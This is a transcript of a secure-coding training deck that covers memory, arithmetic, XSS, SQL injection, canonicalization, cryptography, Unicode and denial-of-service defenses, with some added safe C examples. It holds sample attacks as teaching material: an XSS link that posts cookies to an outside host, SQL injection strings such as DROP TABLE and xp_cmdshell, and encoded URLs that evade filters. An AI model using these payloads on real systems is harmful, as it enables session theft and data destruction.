Name - PowerPoint PPT Presentation

Investigating Cross-Site Scripting. Defending Against Cross ... Investigating SQL Injection Issues. Using Parameterized Queries to Defend Against SQL Injection ... – PowerPoint PPT presentation

Slides: 53
Provided by: Daf5
Transcript and Presenter's Notes

1
Writing Secure Code: Threat Defense
  • Name
  • Job Title
  • Company

2
What We Will Cover
  • The Need For Secure Code
  • Defending Against Memory Issues
  • Defending Against Arithmetic Errors
  • Defending Against Cross-Site Scripting
  • Defending Against SQL Injection
  • Defending Against Canonicalization Issues
  • Defending Against Cryptography Weaknesses
  • Defending Against Unicode Issues
  • Defending Against Denial of Service

3
Session Prerequisites
  • Development experience with Microsoft Visual
    Basic, Microsoft Visual C++, or C#

Level 200
4
Agenda
  • The Need For Secure Code
  • Defending Against Memory Issues
  • Defending Against Arithmetic Errors
  • Defending Against Cross-site Scripting
  • Defending Against SQL Injection
  • Defending Against Canonicalization Issues
  • Defending Against Cryptography Weaknesses
  • Defending Against Unicode Issues
  • Defending Against Denial of Service

5
The Need for Secure Code
Up to 1,500 Web sites could have been affected by a recent hacker attack
US port 'hit by UK hacker'
Piracy cost more than 4,300 jobs and $850 million in damage
Several corporations said they lost $10 million in a single break-in
Sobig virus accounted for $30 billion worth of economic damages worldwide
Attacks will cost the world economy a whopping $1.6 trillion (US) this year
6
Threat Scenarios
  • Employees connecting to the company's network
    • Wired, wireless, dial-up, VPN
    • Company PCs, personally owned systems
  • Employees connecting to other networks
    • Internet hotspots, partner networks, broadband
  • Partners connecting to the company's network
    • Local vs. federated authentication
    • Anonymous guests
  • New scenarios and new threats

7
Potential Attackers
  • Thieves
  • Confidence tricksters
  • Vandals
  • Criminals
  • Hackers
  • It should be no surprise that attacks occur!

8
Common Types of Attack
9
Agenda
  • The Need For Secure Code
  • Defending Against Memory Issues
  • Defending Against Arithmetic Errors
  • Defending Against Cross-site Scripting
  • Defending Against SQL Injection
  • Defending Against Canonicalization Issues
  • Defending Against Cryptography Weaknesses
  • Defending Against Unicode Issues
  • Defending Against Denial of Service

10
What Is a Buffer Overrun?
  • Occurs when data exceeds the expected size and
    overwrites other values
  • Exists primarily in unmanaged C/C++ code
  • Includes four types
    • Stack-based buffer overruns
    • Heap overruns
    • V-table and function pointer overwrites
    • Exception handler overwrites
  • Can be exploited by worms

11
Possible Results of Buffer Overruns
12
Stack-Based Buffer Overrun Example
[Figure: stack layout, from the top of the stack down: char[4] buffer, int, return address]
13
Heap Overruns
  • Overwrite data stored on the heap
  • Are harder to exploit than a buffer overrun

[Figure: strcpy writing past the end of a heap buffer into the adjacent data]
14
Defending Against Buffer Overruns (1 of 2)
  • Be very cautious when using
    • strcpy
    • strncpy
    • CopyMemory
    • MultiByteToWideChar
  • Use the /GS compile option in Visual C++ to spot
    buffer overruns
  • Use strsafe.h for safer buffer handling

15
Defending Against Buffer Overruns (2 of 2)
  • Check all array indexes
  • Use existing wrapper classes for safe array
    handling
  • Check file path lengths using _MAX_PATH
  • Use recognized file path processing methods, such
    as splitpath
  • Use managed code, but pay attention to PInvoke
    and COM Interop
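
As an added example (not from the deck, and not strsafe.h itself), a bounded copy with the fail-closed behaviour the slides recommend, applied to the char[4]-next-to-an-int layout from the stack slide; struct frame, safe_copy, fill_frame and get_at are names chosen here:

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Bounded copy in the spirit of strsafe.h's StringCchCopy. dst_cch is the
 * capacity of dst in characters INCLUDING the terminating NUL. On failure
 * dst becomes an empty string, never a partially copied one, so callers
 * cannot accidentally use truncated data. strcpy performs no such check. */
static bool safe_copy(char *dst, size_t dst_cch, const char *src)
{
    if (dst == NULL || src == NULL || dst_cch == 0)
        return false;
    size_t n = 0;
    while (n < dst_cch && src[n] != '\0')   /* bounded scan: never reads past dst_cch */
        n++;
    if (n == dst_cch) {                      /* src plus its NUL does not fit */
        dst[0] = '\0';
        return false;
    }
    memcpy(dst, src, n + 1);                 /* n + 1 includes the NUL */
    return true;
}

/* Mirrors the deck's stack slide: a char[4] sitting next to an int. With
 * strcpy a name of four or more characters would overwrite 'count' (and,
 * further up, the return address); with safe_copy it is rejected instead. */
struct frame { char name[4]; int count; };

static int fill_frame(struct frame *f, const char *user_input)
{
    f->count = 42;
    if (!safe_copy(f->name, sizeof f->name, user_input))
        return -1;                           /* reject oversize input, do not overflow */
    return 0;
}

/* "Check all array indexes": a read that refuses out-of-range indexes
 * instead of trusting the caller. */
static bool get_at(const int *arr, size_t len, size_t idx, int *out)
{
    if (idx >= len) return false;
    *out = arr[idx];
    return true;
}
```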

16
Agenda
  • The Need For Secure Code
  • Defending Against Memory Issues
  • Defending Against Arithmetic Errors
  • Defending Against Cross-site Scripting
  • Defending Against SQL Injection
  • Defending Against Canonicalization Issues
  • Defending Against Cryptography Weaknesses
  • Defending Against Unicode Issues
  • Defending Against Denial of Service

17
Arithmetic Errors
  • Occur when the limitations of a variable are
    exceeded
  • Lead to serious runtime issues
  • Are often overlooked and underestimated
  • Include
    • Overflow: value too large for the data type
    • Underflow: value too small for the data type

18
Defending Against Arithmetic Errors
  • Be conscious of the limitations of your chosen
    data types
  • Write defensive code that checks for overflows
  • Consider writing safe, reusable functions
  • Consider using a safe template class (if coding
    in C++)
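
Safe, reusable arithmetic helpers of the kind the slide suggests, added here as an illustration rather than taken from the deck; the function names are chosen for this example:

```c
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Unsigned multiply with overflow check: the classic allocation-size bug,
 * where count * elem_size wraps to a small number. */
static bool safe_mul_size(size_t a, size_t b, size_t *out)
{
    if (a != 0 && b > SIZE_MAX / a)
        return false;                 /* a * b would exceed SIZE_MAX */
    *out = a * b;
    return true;
}

/* Unsigned subtract: the deck's "underflow", a length that goes below zero
 * and wraps to a huge value. */
static bool safe_sub_size(size_t a, size_t b, size_t *out)
{
    if (b > a)
        return false;
    *out = a - b;
    return true;
}

/* Signed add checked BEFORE the operation; signed wraparound is undefined
 * behaviour in C, so testing the result afterwards is not a valid check. */
static bool safe_add_int(int a, int b, int *out)
{
    if ((b > 0 && a > INT_MAX - b) || (b < 0 && a < INT_MIN - b))
        return false;
    *out = a + b;
    return true;
}

/* Allocate count elements of elem_size bytes, or NULL if the byte count
 * cannot be represented. malloc(count * elem_size) would silently wrap and
 * hand back an undersized buffer, turning an arithmetic error into an overrun. */
static void *alloc_array(size_t count, size_t elem_size)
{
    size_t bytes;
    if (!safe_mul_size(count, elem_size, &bytes))
        return NULL;
    return malloc(bytes);
}
```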

19
Demonstration 1: Memory Issues and Data Type Errors
  • Investigating Buffer Overruns
  • Using the /GS Compiler Switch
  • Using STRSAFE.H
  • Performing Safe Arithmetic Calculations
20
Agenda
  • The Need For Secure Code
  • Defending Against Memory Issues
  • Defending Against Arithmetic Errors
  • Defending Against Cross-Site Scripting
  • Defending Against SQL Injection
  • Defending Against Canonicalization Issues
  • Defending Against Cryptography Weaknesses
  • Defending Against Unicode Issues
  • Defending Against Denial of Service

21
What Is Cross-Site Scripting?
  • A technique that allows hackers to
    • Execute malicious script in a client's Web
      browser
    • Insert <script>, <object>, <applet>, <form>, and
      <embed> tags
    • Steal Web session information and authentication
      cookies
    • Access the client computer

Any Web page that renders HTML containing user
input is vulnerable
22
Two Common Exploits of Cross-Site Scripting
  • Attacking Web-based e-mail platforms and
    discussion boards
  • Using HTML <form> tags to redirect private
    information

23
Form-Based Attacks (1 of 2)
Response.Write("Welcome " & Request.QueryString("UserName"))
24
Form-Based Attacks (2 of 2)
<a href=http://www.contoso.msft/welcome.asp?name=
<FORM action=http://www.nwtraders.msft/data.asp
method=post id=idForm><INPUT
name=cookie type=hidden></FORM>
<SCRIPT>idForm.cookie.value=document.cookie;
idForm.submit()</SCRIPT>>here</a>
25
Demonstration 2: Cross-Site Scripting
  • Investigating Cross-Site Scripting
26
Defending Against Cross-Site Scripting Attacks
  • Do not
    • Trust user input
    • Echo Web-based user input unless you have
      validated it
    • Store secret information in cookies
  • Do
    • Use the HttpOnly cookie option
    • Use the <frame> security attribute
    • Take advantage of ASP.NET features
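
Output encoding for the deck's welcome.asp case, added as an example (not from the deck; html_encode and welcome_html are names chosen here). Encoding is the complement of the "validate before you echo" rule: whatever survives validation is still rendered as text, not markup.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Encode the five characters that let text break out of an HTML element or
 * attribute value. out_cch is the capacity of out INCLUDING the NUL; on
 * overflow, out is left empty and false is returned (fail closed). */
static bool html_encode(const char *in, char *out, size_t out_cch)
{
    if (out_cch == 0) return false;
    size_t o = 0;
    for (; *in != '\0'; in++) {
        const char *rep = NULL;
        switch (*in) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   break;
        }
        size_t need = rep ? strlen(rep) : 1;
        if (o + need >= out_cch) { out[0] = '\0'; return false; }
        if (rep) memcpy(out + o, rep, need); else out[o] = *in;
        o += need;
    }
    out[o] = '\0';
    return true;
}

/* The deck's welcome page done safely: the untrusted name is encoded before
 * it is placed in the HTML, so a submitted <SCRIPT> tag arrives in the
 * browser as literal text instead of being executed. */
static bool welcome_html(const char *user_name, char *out, size_t out_cch)
{
    char enc[256];
    if (!html_encode(user_name, enc, sizeof enc))
        return false;                      /* too long: refuse, do not truncate */
    int n = snprintf(out, out_cch, "<p>Welcome %s</p>", enc);
    return n >= 0 && (size_t)n < out_cch;
}
```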

27
Agenda
  • The Need For Secure Code
  • Defending Against Memory Issues
  • Defending Against Arithmetic Errors
  • Defending Against Cross-site Scripting
  • Defending Against SQL Injection
  • Defending Against Canonicalization Issues
  • Defending Against Cryptography Weaknesses
  • Defending Against Unicode Issues
  • Defending Against Denial of Service

28
What is SQL Injection?
  • SQL injection is
    • The process of adding SQL statements in user
      input
  • Used by hackers to
    • Probe databases
    • Bypass authorization
    • Execute multiple SQL statements
    • Call built-in stored procedures

29
Examples of SQL Injection
sqlString = "SELECT HasShipped FROM" & " OrderDetail WHERE OrderID = '" & ID & "'"
  • If the ID variable is read directly from a Web
    form or Windows form textbox, the user could
    enter any of the following
    • ALFKI1001
    • ALFKI1001' or 1=1 --
    • ALFKI1001'; DROP TABLE OrderDetail --
    • ALFKI1001'; exec xp_cmdshell('fdisk.exe') --

30
Demonstration 3: SQL Injection
  • Investigating SQL Injection Issues
  • Using Parameterized Queries to Defend Against SQL Injection
31
Defending Against SQL Injection
  • Sanitize all input
    • Consider all input as harmful until proven
      otherwise
    • Look for valid data and reject everything else
    • Consider the use of regular expressions to remove
      unwanted characters
  • Run with least privilege
    • Never execute as sa
    • Restrict access to built-in stored procedures
  • Use stored procedures or SQL parameterized
    queries to access data
  • Do not echo ODBC errors
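
An allow-list validator and a parameterized form of the slide's query, added as an example (not from the deck; the accepted OrderID shape and the struct bound_query type are assumptions made here for illustration):

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Allow-list check for the deck's OrderID. The accepted shape (1-5 upper-case
 * letters then 1-6 digits, e.g. ALFKI1001) is an assumption for this example;
 * real code takes the format from the schema. Ranges are compared directly
 * rather than with isalpha/isdigit so locale settings cannot widen them. */
static bool is_valid_order_id(const char *id)
{
    size_t letters = 0, digits = 0;
    const char *p = id;
    while (*p >= 'A' && *p <= 'Z') { letters++; p++; }
    while (*p >= '0' && *p <= '9') { digits++; p++; }
    /* Anything left over (a quote, a space, ';' or "--") fails the check. */
    return *p == '\0' && letters >= 1 && letters <= 5 && digits >= 1 && digits <= 6;
}

/* Parameterized form of the deck's query: the SQL text is a constant and the
 * value travels separately to the driver (for ODBC, bound to the '?' marker
 * with SQLBindParameter), so no input can change the statement's structure.
 * Splicing the value into the string, as on the slide, is what lets
 * ALFKI1001' or 1=1 -- rewrite the WHERE clause. */
struct bound_query {
    const char *sql;      /* statement text with a placeholder, never user data */
    const char *param;    /* value for the placeholder, passed out of band */
};

static bool prepare_shipped_query(const char *id, struct bound_query *q)
{
    if (!is_valid_order_id(id))
        return false;                 /* validate first; then bind, never splice */
    q->sql = "SELECT HasShipped FROM OrderDetail WHERE OrderID = ?";
    q->param = id;
    return true;
}
```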

32
Agenda
  • The Need For Secure Code
  • Defending Against Memory Issues
  • Defending Against Arithmetic Errors
  • Defending Against Cross-site Scripting
  • Defending Against SQL Injection
  • Defending Against Canonicalization Issues
  • Defending Against Cryptography Weaknesses
  • Defending Against Unicode Issues
  • Defending Against Denial of Service

33
Canonicalization Issues
  • There is usually more than one way to name
    something
  • Alternate representations exist for
    • File names
    • URLs
    • Devices (such as printers)
  • Hackers may exploit code that makes decisions
    based on file names or URLs

34
Canonicalization Issues: Example 1, File Names
  • MyLongFile.txt
  • MyLongFile.txt.
  • MyLong~1.txt
  • MyLongFile.txt::$DATA

35
Canonicalization Issues: Example 2, Character Representation
  • There are many ways to represent characters on
    the Internet

http://www.microsoft.com/technet/security
is the same as
http://www%2emicrosoft%2ecom%2ftechnet%2fsecurity
http://www.microsoft.com%c0%aftechnet%c0%afsecurity
http://www%25%32%65microsoft.com/technet/security
http://172.43.122.12
http://2888530444
36
Demonstration 4: Canonicalization Issues
  • Investigating File Name Security Decisions
37
Defending Against Canonicalization Issues
  • Use file system security to restrict access to
    private data
  • Never make a decision based on a name
  • Disable the IIS Parent Paths setting
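
A single-pass percent-decoder run over the deck's alternate spellings of www.microsoft.com, added as an example (not from the deck; percent_decode and host_is are names chosen here). It shows why "never make a decision based on a name" holds: the name has to be canonical first, and a double-encoded name is not canonical after one pass.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode %XX escapes exactly once. out_cch is the capacity of out INCLUDING
 * the NUL. Returns false on a malformed or truncated escape, or if out is too
 * small; a malformed name is a reason to reject, not to guess. */
static bool percent_decode(const char *in, char *out, size_t out_cch)
{
    if (out_cch == 0) return false;
    size_t o = 0;
    for (; *in != '\0'; in++) {
        char c = *in;
        if (c == '%') {
            int hi = hexval(in[1]);
            int lo = (hi < 0) ? -1 : hexval(in[2]);   /* do not read past a NUL */
            if (hi < 0 || lo < 0) return false;
            c = (char)(hi * 16 + lo);
            in += 2;
        }
        if (o + 1 >= out_cch) return false;
        out[o++] = c;
    }
    out[o] = '\0';
    return true;
}

/* Decide about a host name only in its decoded form, and refuse to decide at
 * all if a '%' survives the single pass: www%25%32%65microsoft.com decodes
 * to www%2emicrosoft.com, which is not yet canonical. */
static bool host_is(const char *url_host, const char *expected)
{
    char dec[256];
    if (!percent_decode(url_host, dec, sizeof dec)) return false;
    if (strchr(dec, '%') != NULL) return false;          /* still encoded: reject */
    return strcmp(dec, expected) == 0;
}
```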

38
Agenda
  • The Need For Secure Code
  • Defending Against Memory Issues
  • Defending Against Arithmetic Errors
  • Defending Against Cross-site Scripting
  • Defending Against SQL Injection
  • Defending Against Canonicalization Issues
  • Defending Against Cryptography Weaknesses
  • Defending Against Unicode Issues
  • Defending Against Denial of Service

39
Cryptography Weaknesses
  • Inappropriate use of algorithms
    • Creating your own
    • Using weak ones
    • Incorrect application
  • Failure to keep keys secure
    • Insecure storage
    • Extensive duration of use
    • The human factor

I need three of the above to decrypt your data!
40
Defending Against Cryptography Weaknesses
  • Recycle keys periodically
  • Use ACLs to restrict access to keys
  • Store keys on an external device
  • Use SACLs to monitor activities
  • Use larger keys to provide increased security
  • Use DPAPI to simplify key management, if possible
  • Do not implement your own cryptographic routines

41
Agenda
  • The Need For Secure Code
  • Defending Against Memory Issues
  • Defending Against Arithmetic Errors
  • Defending Against Cross-site Scripting
  • Defending Against SQL Injection
  • Defending Against Canonicalization Issues
  • Defending Against Cryptography Weaknesses
  • Defending Against Unicode Issues
  • Defending Against Denial of Service

42
Unicode Issues
  • Common mistakes
    • Treating a Unicode character as a single byte
    • Miscalculating required buffer size
    • Misusing MultiByteToWideChar
    • Validating data before conversion, but not
      afterwards
  • Results
    • Buffer overruns
    • Potentially dangerous character sequences
      slipping through your validation routines

43
Defending Against Unicode Issues
  • Calculate buffer sizes using sizeof(WCHAR)
  • Be aware of GB18030 standards (4 bytes per
    character)
  • Convert from Unicode to ASCII and then validate
  • Use IsNLSDefinedString during validation
  • Use MultiByteToWideChar correctly to provide a
    sufficient buffer
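
A portable stand-in for the two-call MultiByteToWideChar sizing pattern, added as an example (not from the deck and not the Windows API itself; utf8_decode, utf8_to_utf16 and UTF_ERR are names chosen here). It shows that byte count, character count and WCHAR count are three different numbers, and it rejects malformed or overlong input (such as the %c0%af spelling of '/') instead of converting it.

```c
#include <stddef.h>
#include <stdint.h>
#define UTF_ERR ((size_t)-1)

/* Decode one UTF-8 sequence (at most n bytes) into cp; return its byte length,
 * or 0 if malformed, overlong (e.g. C0 AF for '/'), a surrogate, or > U+10FFFF. */
static size_t utf8_decode(const uint8_t *s, size_t n, uint32_t *cp)
{
    static const uint32_t minval[5] = { 0, 0, 0x80, 0x800, 0x10000 };
    size_t len;
    if (n == 0) return 0;
    if (s[0] < 0x80) { *cp = s[0]; return 1; }
    if ((s[0] & 0xE0) == 0xC0) len = 2;
    else if ((s[0] & 0xF0) == 0xE0) len = 3;
    else if ((s[0] & 0xF8) == 0xF0) len = 4;
    else return 0;                               /* stray continuation or 0xF8+ lead */
    if (n < len) return 0;                       /* truncated sequence */
    *cp = s[0] & (0x7F >> len);                  /* payload bits of the lead byte */
    for (size_t i = 1; i < len; i++) {
        if ((s[i] & 0xC0) != 0x80) return 0;     /* bad continuation byte */
        *cp = (*cp << 6) | (s[i] & 0x3F);
    }
    if (*cp < minval[len] || *cp > 0x10FFFF || (*cp >= 0xD800 && *cp <= 0xDFFF))
        return 0;                                /* overlong or invalid scalar value */
    return len;
}

/* Two-pass sizing as with MultiByteToWideChar: with dst_cch == 0 only count
 * the UTF-16 units needed (no terminator); otherwise convert into dst.
 * Returns UTF_ERR on invalid UTF-8 or an undersized buffer. */
static size_t utf8_to_utf16(const uint8_t *src, size_t src_len,
                            uint16_t *dst, size_t dst_cch)
{
    size_t i = 0, out = 0;
    while (i < src_len) {
        uint32_t cp;
        size_t len = utf8_decode(src + i, src_len - i, &cp);
        if (len == 0) return UTF_ERR;
        size_t units = (cp >= 0x10000) ? 2 : 1;  /* 4-byte char needs a surrogate pair */
        if (dst_cch > 0) {
            if (out + units > dst_cch) return UTF_ERR;   /* too small: fail, never spill */
            if (units == 1) dst[out] = (uint16_t)cp;
            else { dst[out]     = (uint16_t)(0xD800 + ((cp - 0x10000) >> 10));
                   dst[out + 1] = (uint16_t)(0xDC00 + ((cp - 0x10000) & 0x3FF)); }
        }
        out += units; i += len;
    }
    return out;
}
```

The first call sizes the buffer in UTF-16 units, so the allocation is `units * sizeof(uint16_t)` bytes (sizeof(WCHAR) on Windows), not the UTF-8 byte length.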

44
Demonstration 5: Unicode Issues
  • Investigating Unicode Issues
45
Agenda
  • The Need For Secure Code
  • Defending Against Memory Issues
  • Defending Against Arithmetic Errors
  • Defending Against Cross-site Scripting
  • Defending Against SQL Injection
  • Defending Against Canonicalization Issues
  • Defending Against Cryptography Weaknesses
  • Defending Against Unicode Issues
  • Defending Against Denial of Service

46
Denial of Service Attacks
  • CPU starvation
  • Memory starvation
  • Resource starvation
  • Network starvation

47
Defending Against Denial of Service Attacks
  • Consider security as a design feature
  • Distrust user input
  • Fail intelligently
  • Test security

48
Session Summary
  • The Need For Secure Code
  • Defending Against Memory Issues
  • Defending Against Arithmetic Errors
  • Defending Against Cross-site Scripting
  • Defending Against SQL Injection
  • Defending Against Canonicalization Issues
  • Defending Against Cryptography Weaknesses
  • Defending Against Unicode Issues
  • Defending Against Denial of Service

49
Next Steps
  • Stay informed about security
    • Sign up for security bulletins
      http://www.microsoft.com/security/security_bulletins/alerts2.asp
    • Get the latest Microsoft security guidance
      http://www.microsoft.com/security/guidance/
  • Get additional security training
    • Find online and in-person training seminars
      http://www.microsoft.com/seminar/events/security.mspx
    • Find a local CTEC for hands-on training
      http://www.microsoft.com/learning/

50
For More Information
  • Microsoft Security Site (all audiences)
    http://www.microsoft.com/security
  • MSDN Security Site (developers)
    http://msdn.microsoft.com/security
  • TechNet Security Site (IT professionals)
    http://www.microsoft.com/technet/security

51
Questions and Answers
52